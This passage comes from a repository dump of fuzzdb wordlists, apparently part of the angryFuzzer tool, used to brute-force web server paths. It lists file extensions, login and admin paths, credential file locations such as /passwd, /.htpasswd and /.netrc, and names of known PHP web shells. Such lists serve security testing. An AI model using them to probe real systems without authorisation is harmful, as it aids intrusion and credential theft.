73 | .temp 74 | .test 75 | .tgz 76 | .tmp 77 | .txt 78 | .war 79 | .zip 80 | ~ 81 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Backup.txt: -------------------------------------------------------------------------------- 1 | backup 2 | bck 3 | old 4 | save 5 | bak 6 | sav 7 | ~ 8 | copy 9 | old 10 | orig 11 | tmp 12 | txt 13 | back 14 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Compressed.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 000 3 | 7z 4 | a00 5 | a01 6 | a02 7 | ace 8 | ain 9 | alz 10 | apz 11 | ar 12 | arc 13 | arh 14 | ari 15 | arj 16 | ark 17 | axx 18 | b64 19 | ba 20 | bh 21 | boo 22 | bz 23 | bz2 24 | bzip 25 | bzip2 26 | c00 27 | c01 28 | c02 29 | car 30 | cb7 31 | cbr 32 | cbt 33 | cbz 34 | cp9 35 | cpgz 36 | cpt 37 | dar 38 | dd 39 | deb 40 | dgc 41 | dist 42 | ecs 43 | efw 44 | epi 45 | f 46 | fdp 47 | gca 48 | gz 49 | gzi 50 | gzip 51 | ha 52 | hbc 53 | hbc2 54 | hbe 55 | hki 56 | hki1 57 | hki2 58 | hki3 59 | hpk 60 | hyp 61 | ice 62 | ipg 63 | ipk 64 | ish 65 | j 66 | jar.pack 67 | jgz 68 | jic 69 | kgb 70 | lbr 71 | lemon 72 | lha 73 | lnx 74 | lqr 75 | lz 76 | lzh 77 | lzm 78 | lzma 79 | lzo 80 | lzx 81 | md 82 | mint 83 | mou 84 | mpkg 85 | mzp 86 | oar 87 | p7m 88 | packgz 89 | package 90 | pae 91 | pak 92 | paq6 93 | paq7 94 | paq8 95 | par 96 | par2 97 | pbi 98 | pcv 99 | pea 100 | pet 101 | pf 102 | pim 103 | pit 104 | piz 105 | pkg 106 | pup 107 | puz 108 | pwa 109 | qda 110 | r0 111 | r00 112 | r01 113 | r02 114 | r03 115 | r1 116 | r2 117 | r30 118 | rar 119 | rev 120 | rk 121 | rnc 122 | rp9 123 | rpm 124 | rte 125 | rz 126 | rzs 127 | s00 128 | s01 129 | s02 130 | s7z 131 | sar 132 | sdc 133 | sdn 134 | sea 135 | sen 136 | sfs 137 | sfx 138 | sh 139 | shar 140 | shk 141 | shr 142 | sit 143 | sitx 144 | spt 145 | sqx 146 | sqz 147 | tar 148 | targz 149 | tarxz 150 | taz 151 | tbz 152 | tbz2 153 | tg 154 | tgz 155 | tlz 156 | tlzma 157 | txz 158 | tz 159 | uc2 160 | uha 161 | vem 162 | vsi 163 | wad 164 | war 165 | wot 166 | xef 167 | xez 168 | xmcdz 169 | xpi 170 | xx 171 | xz 172 | y 173 | yz 174 | z 175 | z01 176 | z02 177 | z03 178 | z04 179 | zap 180 | zfsendtotarget 181 | zip 182 | zipx 183 | zix 184 | zoo 185 | zpi 186 | zz 187 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Mostcommon.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | php 4 | php3 5 | php4 6 | php5 7 | txt 8 | shtm 9 | shtml 10 | phtm 11 | phtml 12 | jhtml 13 | pl 14 | jsp 15 | cfm 16 | cfml 17 | py 18 | rb 19 | cfg 20 | zip 21 | pdf 22 | gz 23 | tar 24 | tar.gz 25 | tgz 26 | doc 27 | docx 28 | xls 29 | xlsx 30 | conf 31 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Skipfish.txt: -------------------------------------------------------------------------------- 1 | 7z 2 | asmx 3 | asp 4 | aspx 5 | bak 6 | bat 7 | bin 8 | bz2 9 | c 10 | cc 11 | cfg 12 | cfm 13 | cgi 14 | class 15 | cnf 16 | conf 17 | config 18 | cpp 19 | cs 20 | csv 21 | dat 22 | db 23 | dll 24 | do 25 | doc 26 | dump 27 | ep 28 | err 29 | error 30 | exe 31 | gif 32 | gz 33 | htm 34 | html 35 | inc 36 | ini 37 | java 38 | jhtml 39 | jpg 40 | js 41 | jsf 42 | jsp 43 | key 44 | lib 45 | log 46 | lst 47 | manifest 48 | mdb 49 | meta 50 | msg 51 | nsf 52 | o 53 | old 54 | ora 55 | orig 56 | out 57 | part 58 | pdf 59 | php 60 | php3 61 | phtml 62 | pl 63 | pm 64 | png 65 | ppt 66 | properties 67 | py 68 | rar 69 | rss 70 | rtf 71 | save 72 | sh 73 | shtml 74 | so 75 | sql 76 | stackdump 77 | swf 78 | tar 79 | tar.bz2 80 | tar.gz 81 | temp 82 | test 83 | tgz 84 | tmp 85 | trace 86 | txt 87 | vb 88 | vbs 89 | ws 90 | xls 91 | xml 92 | xsl 93 | zip 94 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/copy_of.txt: -------------------------------------------------------------------------------- 1 | Copy_(1)_of_ 2 | Copy_(2)_of_ 3 | Copy%20of%20 4 | Copy_of_ 5 | Copy_ 6 | Copy%20 7 | _ 8 | %20 9 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/test_demo.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | eval 35 | Eval 36 | EVAL 37 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt: -------------------------------------------------------------------------------- 1 | up 2 | upload 3 | uploads 4 | uploaded 5 | upfiles 6 | uploadfiles 7 | uploads 8 | fileupload 9 | uploadedfiles 10 | uploaded_files 11 | upload_files 12 | upload_content 13 | uploaded_content 14 | uploadcontent 15 | uploadedcontent 16 | uploadcertificates 17 | uploaddocuments 18 | upload_certificates 19 | upload_documents 20 | upload_images 21 | uploadimages 22 | uploadedimages 23 | uploaded_images 24 | uploaded_documents 25 | uploaded_certificates 26 | upload_test 27 | uploadtest 28 | uploadrequests 29 | upload_report 30 | uploadreport 31 | uploadreports 32 | upload_reports 33 | upload_requests 34 | uploadedreports 35 | uploaded_requests 36 | uploaded_reporst 37 | uploadedrequests 38 | upload_temp 39 | upload_tmp 40 | uploadtmp 41 | uploadtemp 42 | upload2 43 | upload3 44 | upload4 45 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/login-file-locations/Logins.txt: -------------------------------------------------------------------------------- 1 | /admin 2 | /Admin 3 | /admin.asp 4 | /admin.aspx 5 | /admin.cfm 6 | /admin.jsp 7 | /admin.php 8 | /Admin.php 9 | /admin.php4 10 | /admin.pl 11 | /Admin.pl 12 | /admin.py 13 | /admin.rb 14 | /administrator 15 | /Administrator 16 | /administrator.asp 17 | /administrator.aspx 18 | /administrator.cfm 19 | /administrator.jsp 20 | /administrator.php 21 | /Administrator.php 22 | /administrator.php4 23 | /administrator.pl 24 | /administrator.py 25 | /Administrator.py 26 | /administrator.rb 27 | /admnistrator.php3 28 | /cgi-bin/sqwebmail?noframes=1 29 | /default.asp 30 | /exchange/logon.asp 31 | /gs/admin 32 | /index.php?u= 33 | /login 34 | /Login 35 | /login.asp 36 | /login.aspx 37 | /login.cfm 38 | /login.php 39 | /Login.php 40 | /login.php3 41 | /login.php4 42 | /login.pl 43 | /Login.pl 44 | /login.py 45 | /login.rb 46 | /logon 47 | /Logon 48 | /logon.asp 49 | /logon.aspx 50 | /logon.jsp 51 | /logon.php 52 | /Logon.php 53 | /logon.php3 54 | /logon.php4 55 | /logon.pl 56 | /Logon.pl 57 | /logon.py 58 | /logon.rb 59 | /typo3/in 60 | /utilities/TreeView.asp 61 | /webeditor.php 62 | /exchange/logon.asp 63 | /names.nsf?OpenDatabase 64 | /Citrix/NFuse17/ 65 | /citrix/metaframe/default/ 66 | /Citrix/MetaFrameXP/ 67 | /phpmyadmin 68 | /InfoViewApp/logon.jsp 69 | /dana-na/auth/url_default/welcome.cgi 70 | /src/login.php 71 | 72 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/password-file-locations/Passwords.txt: -------------------------------------------------------------------------------- 1 | /secring.skr 2 | /secring.pgp 3 | /secring.bak 4 | /passwd 5 | /passwd.bak 6 | /master.passwd 7 | /pwd.db 8 | /htpasswd 9 | /htpasswd.bak 10 | /htgroup 11 | /spwd.db 12 | /htpasswd/htpasswd.bak 13 | /config.php 14 | /phpinfo.php 15 | /passlist 16 | /passlist.txt 17 | /auth_user_file 18 | /administrators.pwd 19 | /admin.mdb 20 | /connect.inc 21 | /globals.inc 22 | /vtund.conf 23 | /password.log 24 | /slapd.conf 25 | /wvdial.conf 26 | /.netrc 27 | /wand.dat 28 | /mrtg.cfg 29 | /zebra.conf 30 | /ospfd.conf 31 | /ccbill.log 32 | /users.mdb 33 | /lilo.conf 34 | /wwwboard/passwd.txt 35 | /db/main.mdb 36 | /sites.ini 37 | /wcx_ftp.ini 38 | /ws_ftp.ini 39 | /flashFXP.ini 40 | /serv-u.ini 41 | /eudora.ini 42 | /unattend.txt 43 | /passwd.txt 44 | /server.cfg 45 | /pass.dat 46 | /phpinfo.php 47 | /admin.dat 48 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/php/PHP.txt: -------------------------------------------------------------------------------- 1 | /phpinfo.php 2 | /test.php 3 | /test1.php 4 | /test2.php 5 | /_index.php 6 | /__index.php 7 | /index.php~ 8 | /index.php-bak 9 | /index-bak 10 | /index.php.bak 11 | /info.php 12 | /phpsecinfo 13 | /php.ini 14 | /php.ini~ 15 | /php 16 | /phpsecinfo 17 | /phpinfo 18 | /phpmyadmin/ 19 | /phpMyAdmin/ 20 | /mysqladmin/ 21 | /MySQLadmin 22 | /MySQLAdmin 23 | /login.php 24 | /logon.php 25 | /xmlrpc.php 26 | /dbadmin 27 | /PMA 28 | /application/configs/application.ini 29 | /awstats 30 | /myadmin -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/php/PHP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | c99.php 2 | c99shell.php 3 | r57.php 4 | r58.php 5 | dra.php 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/proxy-conf.txt: -------------------------------------------------------------------------------- 1 | /pac/ 2 | /proxy/ 3 | /.pac/ 4 | /managers/ 5 | /admin/ 6 | /employees/ 7 | /users/ 8 | /proxy/pac/ 9 | .pac 10 | proxy.pac 11 | /.pac/.pac 12 | /.pac/proxy.pac 13 | /proxy/.pac 14 | /proxy/proxy.pac 15 | /pac/.pac 16 | /pac/proxy.pac 17 | /managers/.pac 18 | /managers/proxy.pac 19 | /admin/.pac 20 | /admin/proxy.pac 21 | /employees/.pac 22 | /employees/proxy.pac 23 | /users/.pac 24 | /users/proxy.pac 25 | /proxy/pac/proxy.pac 26 | /proxy/pac/.pac 27 | users.pac 28 | admin.pac 29 | managers.pac 30 | employees.pac 31 | guest.pac 32 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/tftp.txt: -------------------------------------------------------------------------------- 1 | # files commonly transmitted via tftp 2 | 000000000000.cfg 3 | 000000000000-directory~.xml 4 | 323tosip1_1.bin 5 | 4601_02_readme_R2_3.txt 6 | 4601dbte1_82.bin 7 | 4602_02SWSIPreadme_R1_1.txt 8 | 4602dbte1_82.bin 9 | 4602sbte1_82.bin 10 | 4610_20_readme_R2_3.txt 11 | 4610_20_readme_SIP_R2_2.txt 12 | 4624_12_06readme_1_8_3.txt 13 | 4625_readme_2_5.txt 14 | 4690_010707.bin 15 | 4690_readme_1_7_7.txt 16 | 46xxreadme_111405.txt 17 | 46xxsettings.txt 18 | 46xxupgrade.scr 19 | a01d01b2_3.bin 20 | a02d01b2_3.bin 21 | a10d01b2_3.bin 22 | a20d01a2_3.bin 23 | a20d01b2_3.bin 24 | a25d01a2_5.bin 25 | b01d01b2_3.bin 26 | b02d01b2_3.bin 27 | b10d01b2_3.bin 28 | b20d01a2_3.bin 29 | b20d01b2_3.bin 30 | b25d01a2_5.bin 31 | bbla0_83.bin 32 | bootrom.ld 33 | cisco_util 34 | CP7912010301SIP050608A.sbin 35 | cvt01_2_3.bin 36 | cvt02_2_3.bin 37 | cvt02sw_2_3.bin 38 | def06r1_8_3.bin 39 | def24r1_8_3.bin 40 | dialplan.xml 41 | gkdefault.cfg 42 | infrared.txt 43 | merlin2.pcm 44 | OS79XX.TXT 45 | P003-07-5-00.bin 46 | P003-07-5-00.sbn 47 | P0S3-07-5-00.bin 48 | P0S3-07-5-00.loads 49 | P0S3-07-5-00.sb2 50 | phbook00e011010455.txt 51 | phone1.cfg 52 | release.xml 53 | RINGLIST.DAT 54 | s10d01b2_2.bin 55 | s20d01b2_2.bin 56 | SEP000F34118045.cnf 57 | SEP001562EA69E8.cnf 58 | SEPDefault.cnf 59 | SIP000F34118045.cnf 60 | SIPinsertMAChere.cnf 61 | SIPinsertMAChere.cnf 62 | sip_4602ap1_1.ebin 63 | sip_4602bt1_1.ebin 64 | sip_4602D01A.txt 65 | sip_4602D02A.txt 66 | sip.cfg 67 | SIPDefault.cnf 68 | sip.ld 69 | sipto323_1_1.ebin 70 | sip.ver 71 | SoundPointIPLocalization 72 | SoundPointIPWelcome.wav 73 | syncinfo.xml 74 | test 75 | test.txt 76 | uip200_463enc.pac 77 | uniden00e011030397.txt 78 | unidencom.txt 79 | XMLDefault.cnf.xml 80 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/AdobeXML.txt: -------------------------------------------------------------------------------- 1 | /flex2gateway/ 2 | /flex2gateway/http 3 | /flex2gateway/httpsecure 4 | /flex2gateway/cfamfpoolling 5 | /flex2gateway/amf 6 | /flex2gateway/amfpolling 7 | /messagebroker/http 8 | /messagebroker/httpsecure 9 | /blazeds/messagebroker/http 10 | /blazeds/messagebroker/httpsecure 11 | /samples/messagebroker/http 12 | /samples/messagebroker/httpsecure 13 | /lcds/messagebroker/http 14 | /lcds/messagebroker/httpsecure 15 | /lcds-samples/messagebroker/http 16 | /lcds-samples/messagebroker/httpsecure 17 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Apache.txt: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess.bak 3 | /.htpasswd 4 | /.meta 5 | /.web 6 | /apache/logs/access.log 7 | /apache/logs/access_log 8 | /apache/logs/error.log 9 | /apache/logs/error_log 10 | /httpd/logs/access.log 11 | /httpd/logs/access_log 12 | /httpd/logs/error.log 13 | /httpd/logs/error_log 14 | /logs/access.log 15 | /logs/access.log 16 | /logs/error.log 17 | /logs/error_log 18 | /access_log 19 | /cgi 20 | /cgi-bin 21 | /cgi-pub 22 | /cgi-script 23 | /dummy 24 | /error 25 | /error_log 26 | /htdocs 27 | /httpd 28 | /httpd.pid 29 | /icons 30 | /index.html 31 | /logs 32 | /manual 33 | /phf 34 | /printenv 35 | /server-info 36 | /server-status 37 | /status 38 | /test-cgi 39 | /tmp 40 | /~bin 41 | /~ftp 42 | /~nobody 43 | /~root 44 | /~toor 45 | /~daemon 46 | /~adm 47 | /~lp 48 | /~sync 49 | /~shutdown 50 | /~halt 51 | /~mail 52 | /~pop 53 | /~postmaster 54 | /~news 55 | /~uucp 56 | /~operator 57 | /~games 58 | /~gopher 59 | /~nscd 60 | /~mailnull 61 | /~ident 62 | /~rpc 63 | /~rpcuser 64 | /~xfs 65 | /~gdm 66 | /~apache 67 | /~http 68 | /~web 69 | /~www 70 | /~adm 71 | /~admin 72 | /~administrator 73 | /~guest 74 | /~firewall 75 | /~fwuser 76 | /~fwadmin 77 | /~fw 78 | /~test 79 | /~testuser 80 | /~user 81 | /~user1 82 | /~user2 83 | /~user3 84 | /~user4 85 | /~user5 86 | /~sql 87 | /~data 88 | /~database 89 | /~db 90 | /~anonymous 91 | /~staff 92 | /~office 93 | /~help 94 | /~helpdesk 95 | /~reception 96 | /~system 97 | /~operator 98 | /~backup 99 | /~vagrant 100 | /~guest 101 | /~mysql 102 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/ApacheTomcat.txt: -------------------------------------------------------------------------------- 1 | /examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | /examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/mstrWebAdmin 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 27 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 29 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 30 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 32 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 33 | /servlet/org.apache.catalina.servlets.ManagerServlet 34 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 35 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 36 | /tomcat-docs 37 | /webdav 38 | /webdav/index.html 39 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 40 | /webdav/servlet/webdav/ 41 | /conf/ 42 | /conf/server.xml/ 43 | /WEB-INF/ 44 | /WEB-INF/web.xml 45 | /WEB-INF/classes/ 46 | /shared/ 47 | /shared/lib/ 48 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Apache_Axis.txt: -------------------------------------------------------------------------------- 1 | AdminServlet 2 | AxisServlet 3 | EchoHeaders.jws 4 | SOAPMonitor 5 | StockQuoteService.jws 6 | fingerprint.jsp 7 | happyaxis.jsp 8 | i18nLib.jsp 9 | index.html 10 | index.jsp 11 | index.jws 12 | services 13 | services/ 14 | servlet 15 | servlet/AdminServlet 16 | servlet/AxisServlet 17 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Frontpage.txt: -------------------------------------------------------------------------------- 1 | /admin.dll 2 | /admin.exe 3 | /administrators.pwd 4 | /author.dll 5 | /author.exe 6 | /author.log 7 | /authors.pwd 8 | /cgi-bin 9 | /default.htm 10 | /_fpclass 11 | /frontpg.ini 12 | /.htaccess 13 | /iisadmin 14 | /isadmin 15 | /logo.gif 16 | /_private 17 | /queryhit.htm 18 | /QUERYHIT.HTM 19 | /samples 20 | /search 21 | /Search 22 | /service.grp 23 | /service.pwd 24 | /shtml.exe 25 | /srchadm 26 | /users.pwd 27 | /_vti_adm 28 | /_vti_aut 29 | /_vti_bin 30 | /_vti_cnf 31 | /_vti_inf.html 32 | /vti_inf.html 33 | /_vti_log 34 | /_vti_pvt 35 | /_vti_txt 36 | /_vti_bin/_vti_aut/author.dll 37 | /_vti_bin/shtml.exe?_vti_rp 38 | 39 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/HTTP_POST_Microsoft.txt: -------------------------------------------------------------------------------- 1 | # Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb 2 | /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName 3 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JBoss.txt: -------------------------------------------------------------------------------- 1 | /jmx-console 2 | /web-console 3 | /web-console/Invoker 4 | /invoker/JMXInvokerServlet 5 | /WEB-INF/jboss-web.xml 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JRun.txt: -------------------------------------------------------------------------------- 1 | /compass/logon.jsp 2 | /databasenotes.html 3 | /flash/java/javabean/FlashJavaBean.html 4 | /jrunscripts 5 | /jstl-war/index.html 6 | /SmarTicketApp/index.html 7 | /techniques/servlets/index.html 8 | /travelnet/home.jsp 9 | /WEB-INF/webapp.properties 10 | /WEB-INF/web.xml 11 | /worldmusic/action/catalog 12 | /worldmusic/action/cdlist 13 | /ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JavaServlets_Common.txt: -------------------------------------------------------------------------------- 1 | /DWREasyAjax/dwr/index.html 2 | /dwr/index.html 3 | /dwr/engine.js 4 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Netware.txt: -------------------------------------------------------------------------------- 1 | /ICHAINErrors 2 | /ICSLogin 3 | /ICHAINLogout 4 | /ICSIBroker 5 | /NetStorage 6 | /iManager 7 | /eMFrame 8 | /oneNet 9 | /ICHAIN 10 | /ICS 11 | /NSearch 12 | /SearchServlet 13 | /site 14 | /home.html 15 | /iFolder 16 | /update 17 | /webacc 18 | /nps 19 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Oracle9i.txt: -------------------------------------------------------------------------------- 1 | /CookieExample 2 | /Counter 3 | /DateServlet 4 | /HelloWorldServlet 5 | /RequestParamExample 6 | /SessionExample 7 | /SessionServlet 8 | /SimpleServlet 9 | /SnoopServlet 10 | /basic 11 | /cal 12 | /cgi-bin 13 | /echo 14 | /examples 15 | /fcgi-bin 16 | /hellouser 17 | /hellouser.jsp 18 | /j2ee 19 | /jsp 20 | /login.html 21 | /ojspdemos 22 | /perl 23 | /printenv 24 | /servlet 25 | /simple 26 | /snoop.jsp 27 | /snp 28 | /usebean.jsp 29 | /welcomeuser.jsp 30 | /pls 31 | /SIMPLEDAD 32 | /HTMLDB 33 | /ORASSO 34 | /SSODAD 35 | /PORTAL 36 | /PORTAL2 37 | /PORTAL30 38 | /PORTAL30_SSO 39 | /TEST 40 | /DAD 41 | /APP 42 | /ONLINE 43 | /DB 44 | /OWA 45 | /simpledad 46 | /htmldb 47 | /orasso 48 | /ssodad 49 | /portal 50 | /portal2 51 | /portal30 52 | /portal30_sso 53 | /test 54 | /dad 55 | /app 56 | /online 57 | /db 58 | /owa 59 | /null 60 | /pls/dad/null 61 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/README.md: -------------------------------------------------------------------------------- 1 | 2 | Notes: 3 | 4 | ADFS.fuzz.txt 5 | Microsoft ADFS is usually installed on a webserver in under the default HTTP root path location /adfs/ls but this is not mandatory. 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Ruby_Rails.txt: -------------------------------------------------------------------------------- 1 | .gitignore 2 | Gemfile 3 | README 4 | README.rdoc 5 | Rakefile 6 | app 7 | app/assets/images/rails.png 8 | app/assets/javascripts/application.js 9 | app/assets/stylesheets/application.css 10 | app/controllers 11 | app/controllers/admin_controller.rb 12 | app/controllers/application.rb 13 | app/controllers/application_controller.rb 14 | app/helpers/application_helper.rb 15 | app/mailers 16 | app/mailers/.gitkeep 17 | app/models 18 | app/models/.gitkeep 19 | app/views/layouts/application.html.erb 20 | config 21 | config.ru 22 | config/application.rb 23 | config/boot.rb 24 | config/database.yml 25 | config/deploy.rb 26 | config/environment.rb 27 | config/environments 28 | config/environments/development.rb 29 | config/environments/production.rb 30 | config/environments/test.rb 31 | config/initializers 32 | config/initializers/backtrace_silencers.rb 33 | config/initializers/inflections.rb 34 | config/initializers/mime_types.rb 35 | config/initializers/secret_token.rb 36 | config/initializers/session_store.rb 37 | config/initializers/wrap_parameters.rb 38 | config/locales 39 | config/locales/en.yml 40 | config/routes.rb 41 | core 42 | create 43 | db 44 | db/seeds.rb 45 | dispatch.cgi 46 | dispatch.fcgi 47 | dispatch.rb 48 | doc 49 | doc/README_FOR_APP 50 | lib 51 | lib/assets 52 | lib/assets/.gitkeep 53 | lib/tasks 54 | lib/tasks/.gitkeep 55 | log 56 | log/.gitkeep 57 | log/development.log 58 | log/production.log 59 | log/server.log 60 | log/test.log 61 | public 62 | public/404.html 63 | public/422.html 64 | public/500.html 65 | public/favicon.ico 66 | public/index.html 67 | public/robots.txt 68 | rails 69 | rails/info 70 | rails/info/properties 71 | script 72 | script/about 73 | script/console 74 | script/dbconsole 75 | script/destroy 76 | script/generate 77 | script/performance 78 | script/performance/benchmarker 79 | script/performance/profiler 80 | script/performance/request 81 | script/plugin 82 | script/process 83 | script/process/inspector 84 | script/process/reaper 85 | script/process/spawner 86 | script/rails 87 | script/runner 88 | script/server 89 | stdlib 90 | test/fixtures 91 | test/fixtures/.gitkeep 92 | test/functional 93 | test/functional/.gitkeep 94 | test/integration 95 | test/integration/.gitkeep 96 | test/performance/browsing_test.rb 97 | test/test_helper.rb 98 | test/unit 99 | test/unit/.gitkeep 100 | tmp/cache 101 | tmp/cache/assets 102 | vendor/assets/javascripts 103 | vendor/assets/javascripts/.gitkeep 104 